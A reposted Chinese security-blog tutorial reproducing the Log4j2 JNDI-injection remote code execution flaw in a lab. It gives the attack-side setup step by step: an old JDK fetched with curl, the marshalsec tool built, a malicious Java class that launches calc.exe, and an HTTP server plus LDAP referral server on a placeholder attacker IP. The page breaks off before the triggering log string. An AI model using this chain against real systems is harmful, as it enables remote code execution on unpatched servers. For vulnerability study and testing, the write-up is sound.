站长网 安全 Apache Log4j2远程代码实施漏洞复现

Apache Log4j2远程代码实施漏洞复现

漏洞原理 log4j2版本 log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。 影响版本 Log4j2.x=2.14.1 漏洞复现 漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ 准备环境 把受影响的jar包拖进随手建立的一个java项目

漏洞原理
log4j2版本 < log4j-2.15.0-rc2 可由JNDI注入实现远程代码执行。
 
影响版本
Log4j2.x<=2.14.1
漏洞复现
漏洞分析的可以参考逐日实验室的这篇:https://mp.weixin.qq.com/s/l7iclJRegADs3oiEdcgAvQ
 
准备环境
 
把受影响的jar包拖进随手建立的一个java项目,这里部署jar包步骤就不写了,网上一搜傻瓜式教程都有。
image.png
 
image.png
 
攻击机环境搭建,这里我用的vps(师兄的,因为我的是Windows。)jdk版本最好<=8u191,基于ldap的利用方式,适用jdk版本:JDK 11.0.1、8u191、7u201、6u211之前。
 
这里我的java版本是
 
curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz
tar zxvf jdk-8u20-linux-x64.tar.gz
rm -rf /usr/bin/java*
ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
image.png
 
下载marshalsec(我这里已经安装好):
 
git clone https://github.com/mbechler/marshalsec.git
image.png
 
然后安装maven:
 
apt-get install maven
然后使用maven编译marshalsec成jar包,我们先进入下载的marshalsec文件中运行:
 
mvn clean package -DskipTests
都成功后,编译恶意类代码robots.java
 
再用javac编译成robots.class文件
 
javac robots.java
import java.lang.Runtime;
import java.lang.Process;
public class robots{
 static {
 try {
 Runtime rt = Runtime.getRuntime();
 String[] commands = {"calc.exe"};
 Process pc = rt.exec(commands);
 pc.waitFor();
 } catch (Exception e) {
 // do nothing
 }
 }
}
image.png
 
搭建http服务传输恶意class文件
 
python -m SimpleHTTPServer 80
45e13ef22cd9954b27afb68b660169d.png
 
然后我们借助marshalsec项目,启动一个LDAP服务器,监听9999端口,这里的ip为vps的ip
 
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://x.x.x.x/#robots" 9999

本文来自网络,不代表站长网立场,转载请注明出处:https://www.tzzz.com.cn/html/fuwuqi/anquan/2021/1213/37541.html

作者: dawei

【声明】:站长网内容转载自互联网,其相关言论仅代表作者个人观点绝非权威,不代表本站立场。如您发现内容存在版权问题,请提交相关链接至邮箱:bqsm@foxmail.com,我们将及时予以处理。
联系我们

联系我们

0577-28828765

在线咨询: QQ交谈

邮箱: xwei067@foxmail.com

工作时间:周一至周五,9:00-17:30,节假日休息

返回顶部